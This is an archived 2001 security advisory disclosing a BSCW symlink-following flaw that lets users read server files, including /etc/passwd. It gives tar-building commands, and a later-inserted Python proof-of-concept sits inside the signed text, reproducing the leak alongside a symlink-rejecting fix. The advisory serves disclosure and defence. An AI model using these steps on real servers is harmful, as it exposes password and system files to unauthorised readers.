BSCW symlink vulnerability

From: SQEHXLLBQUJXat_private
Date: Wed Aug 22 2001 - 17:56:29 PDT


    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1
    
    BSCW Security Issues
    
    [ Vulnerability Type ]
      The BSCW software follows symlinks.
    
    [ Effect ]
      A malicious user can read every file on the system that the BSCW UID can read.
    
    [ Software affected ]
      BSCW 3.x (only on Unix-like systems)
    
    [ Severity ]
      medium to high risk
    
    [ Solution ]
      install patches / updates from http://bscw.gmd.de/pycXX , where XX is
    the version of your Python installation.
    
    DESCRIPTION:
    
    BSCW is a groupware system that runs on a webserver. For more information 
    about BSCW visit the developer website (http://bscw.gmd.de/ and 
    http://www.orbiteam.de ).
    
    While playing around with symlinks and how the BSCW system handles them, I
    noticed that it follows symlinks. Since it offers users the ability to extract
    .tar files into their "data-bag" (private space), symlink following can be
    exploited by a malicious user. To do this he/she needs to create a .tar file
    that contains a symlink pointing to a file he/she wants to read. After this
    .tar file has been uploaded to the BSCW server and extracted by clicking on
    the "extract" menu option, the "data-bag" of the user contains the symlink as
    a BSCW data object. Clicking on it will make the BSCW system follow the
    symlink and retrieve the target file, so the user is able to download/view
    it.
    
    Example:
    
    my_host:/tmp/>ln -s /etc/passwd testlink
    my_host:/tmp/>tar cvf testlink.tar testlink
    
    After uploading it to the BSCW server and extracting it, you can click on the 
    "testlink" item in your "data-bag" and retrieve the /etc/passwd file of the 
    server.
    
    In short, the attacker can view any file on the system that the UID under
    which BSCW runs is able to read. In most installations this is the web
    server's UID (nobody, wwwrun). This gives the malicious user access to BSCW
    data items he could normally not read or, worse, lets him retrieve the BSCW
    password file to crack other users' passwords or to gather information for
    further penetration of the system.
    
    The early "op_extract" patch fixes that but leaves a few other exploitable issues.
    
    A second vulnerability lies in the standard installation, which calls the
    external "zip" tool when converting .tar files to .zip files. After the
    "op_extract" patch the symlink itself could no longer be accessed, because
    the new extract function checks for symlinks after tar has been called. But
    by having the server convert the attacker's .tar file to a .zip file, zip
    follows the symlink while packing and stores the content of the link's
    target in the archive. If you have customized calls to external programs
    (e.g. packer conversion utilities) in your BSCW system configuration, you
    should check whether they can be exploited through symlink following.
    
    The latest patch, "untar.py", introduces a wrapper that checks for symlinks
    before extraction and seems to fix all symlink vulnerabilities.
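The following is an added example, not code from this advisory or from BSCW itself. It reproduces the whole chain described above in one self-contained script: the attacker's tar with a symlink member (the `ln -s` / `tar cvf` step), a naive extraction that drops the symlink into the data-bag and lets it be read, the tar-to-zip conversion that follows the link even when the symlink itself is no longer served, and a pre-extraction check in the spirit of the "untar.py" wrapper that rejects link members before anything touches the filesystem. The function names, the temporary "data-bag" directories and the stand-in secret file are all constructed for the demonstration; `safe_extract` models the approach, not the actual untar.py code.

```python
import io
import os
import tarfile
import tempfile
import zipfile

# Python 3.12+ (and the security backports) accept an extraction filter; pass
# the permissive one explicitly so the "unpatched" path behaves the same on
# every interpreter version instead of being silently hardened by newer defaults.
_TRUSTING = {"filter": "fully_trusted"} if hasattr(tarfile, "fully_trusted_filter") else {}


def build_symlink_tar(link_name: str, target: str) -> bytes:
    """Build an in-memory .tar whose only member is a symlink to `target`.
    Equivalent to: ln -s target link_name; tar cvf x.tar link_name"""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        info = tarfile.TarInfo(link_name)
        info.type = tarfile.SYMTYPE
        info.linkname = target
        tar.addfile(info)
    return buf.getvalue()


def naive_extract(tar_bytes: bytes, dest: str) -> None:
    """Unpatched behaviour: every member, symlinks included, lands in dest."""
    with tarfile.open(fileobj=io.BytesIO(tar_bytes)) as tar:
        tar.extractall(dest, **_TRUSTING)


def safe_extract(tar_bytes: bytes, dest: str) -> list:
    """untar.py-style wrapper: inspect members BEFORE extracting. Rejects symlinks,
    hard links, device/fifo entries, absolute names and '..' traversal.
    Returns the names of rejected members; only plain files/dirs are extracted."""
    rejected, allowed = [], []
    dest_real = os.path.realpath(dest)
    with tarfile.open(fileobj=io.BytesIO(tar_bytes)) as tar:
        for m in tar.getmembers():
            if m.issym() or m.islnk() or not (m.isfile() or m.isdir()):
                rejected.append(m.name)
                continue
            where = os.path.realpath(os.path.join(dest, m.name))
            if os.path.commonpath([dest_real, where]) != dest_real:
                rejected.append(m.name)  # escapes the data-bag directory
                continue
            allowed.append(m)
        tar.extractall(dest, members=allowed, **_TRUSTING)
    return rejected


def convert_dir_to_zip(src_dir: str) -> bytes:
    """Pack a directory the way a tar->zip converter does. zipfile.write() opens
    the path it is given, so a symlink is followed and the TARGET's bytes are
    stored under the link's name. The external `zip` tool behaves the same."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for root, _dirs, files in os.walk(src_dir):
            for name in files:
                path = os.path.join(root, name)
                zf.write(path, os.path.relpath(path, src_dir))
    return buf.getvalue()


def demo() -> dict:
    """Constructed scenario: a file readable by the server UID (stand-in for the
    BSCW password file) and an uploaded tar containing `testlink -> <that file>`."""
    with tempfile.TemporaryDirectory() as work:
        secret = os.path.join(work, "bscw_passwd")
        with open(secret, "w") as f:
            f.write("alice:$1$constructed$hash\n")  # constructed sample content
        evil_tar = build_symlink_tar("testlink", secret)

        # 1. Unpatched op_extract: the symlink is created; reading it leaks the target.
        bag1 = os.path.join(work, "databag_unpatched")
        os.mkdir(bag1)
        naive_extract(evil_tar, bag1)
        link = os.path.join(bag1, "testlink")
        leaked_by_read = open(link).read() if os.path.islink(link) else None

        # 2. Post-extraction check only (first fix): even if the link object is no
        #    longer served, a tar->zip conversion of the data-bag follows it.
        with zipfile.ZipFile(io.BytesIO(convert_dir_to_zip(bag1))) as zf:
            leaked_by_zip = zf.read("testlink").decode()

        # 3. Pre-extraction check (untar.py idea): the link member never hits disk.
        bag2 = os.path.join(work, "databag_patched")
        os.mkdir(bag2)
        rejected = safe_extract(evil_tar, bag2)
        return {
            "leaked_by_read": leaked_by_read,
            "leaked_by_zip": leaked_by_zip,
            "rejected": rejected,
            "patched_bag_contents": os.listdir(bag2),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The point of step 2 is the one the advisory makes about customized external calls: a check that runs after the archive has been unpacked, or that only hides the link object from the web UI, does not help once any other tool walks the same directory. Rejecting link members (and traversal) from the archive listing before extraction closes both paths at once.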
    
    You can download the patches and view the installation instructions at
    http://bscw.gmd.de/pycXX , where XX is the version of your installed python
    package (e.g. http://bscw.gmd.de/pyc20 for python 2.0).
    
    The developers of BSCW have done a good job patching the security holes
    within 24 hours after I sent them a notice about the vulnerability.
    
    neovatar
    neovatar(at)wiretap(dot)de
    public key at http://www.wiretap.de/neovatar.pub
    
    DISCLAIMER:
    I'm not affiliated with GMD or ORBITEAM or BSCW in any way. Registered
    trademarks and terms in this report belong to their owners.
    
    
    
    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.0.6 (GNU/Linux)
    Comment: For info see http://www.gnupg.org
    
    iD8DBQE7hFTBzEyYWk8cQasRAhAiAKCOCYleJnk49KxPDzAht2GPwKmbKgCdGQBq
    iHXuhdS5onO9/JAs97FhrH0=
    =gmh1
    -----END PGP SIGNATURE-----
    



    This archive was generated by hypermail 2b30 : Wed Aug 22 2001 - 18:27:02 PDT